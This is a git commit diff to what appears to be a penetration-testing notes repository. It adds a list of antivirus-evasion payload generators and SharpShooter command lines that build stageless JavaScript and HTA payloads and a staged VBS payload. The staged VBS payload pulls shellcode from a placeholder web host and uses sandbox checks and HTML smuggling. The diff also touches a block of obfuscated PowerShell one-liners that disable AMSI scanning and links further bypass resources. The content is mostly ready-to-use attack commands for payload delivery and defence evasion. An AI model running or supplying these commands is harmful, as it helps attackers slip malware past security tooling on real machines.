GitBook: [master] 2 pages modified
This commit is contained in:
parent
4bd90e6d73
commit
b4cf1b25d8
@ -204,6 +204,33 @@ https://github.com/l0ss/Grouper2
|
||||
|
||||
{% embed url="http://niiconsulting.com/checkmate/2018/06/bypassing-detection-for-a-reverse-meterpreter-shell/" %}
|
||||
|
||||
## Other tools
|
||||
|
||||
```bash
|
||||
# Veil Framework:
|
||||
https://github.com/Veil-Framework/Veil
|
||||
|
||||
# Shellter
|
||||
https://www.shellterproject.com/download/
|
||||
|
||||
# Sharpshooter
|
||||
# https://github.com/mdsecactivebreach/SharpShooter
|
||||
# Javascript Payload Stageless:
|
||||
SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3
|
||||
|
||||
# Stageless HTA Payload:
|
||||
SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee
|
||||
|
||||
# Staged VBS:
|
||||
SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4
|
||||
|
||||
# Donut:
|
||||
https://github.com/TheWover/donut
|
||||
|
||||
# Vulcan
|
||||
https://github.com/praetorian-code/vulcan
|
||||
```
|
||||
|
||||
## More
|
||||
|
||||
{% embed url="https://github.com/EgeBalci/sgn" %}
|
||||
|
@ -329,7 +329,7 @@ Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
|
||||
|
||||
## AMSI bypass
|
||||
|
||||
```text
|
||||
```bash
|
||||
(old)
|
||||
[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
|
||||
|
||||
@ -338,5 +338,17 @@ $a = 'System.Management.Automation.A';$b = 'ms';$u = 'Utils'
|
||||
$assembly = [Ref].Assembly.GetType(('{0}{1}i{2}' -f $a,$b,$u))
|
||||
$field = $assembly.GetField(('a{0}iInitFailed' -f $b),'NonPublic,Static')
|
||||
$field.SetValue($null,$true)
|
||||
|
||||
|
||||
# Testing for Amsi Bypass:
|
||||
https://github.com/rasta-mouse/AmsiScanBufferBypass
|
||||
|
||||
# Amsi-Bypass-Powershell
|
||||
https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
|
||||
|
||||
https://blog.f-secure.com/hunting-for-amsi-bypasses/
|
||||
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
|
||||
https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans
|
||||
https://slaeryan.github.io/posts/falcon-zero-alpha.html
|
||||
```
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user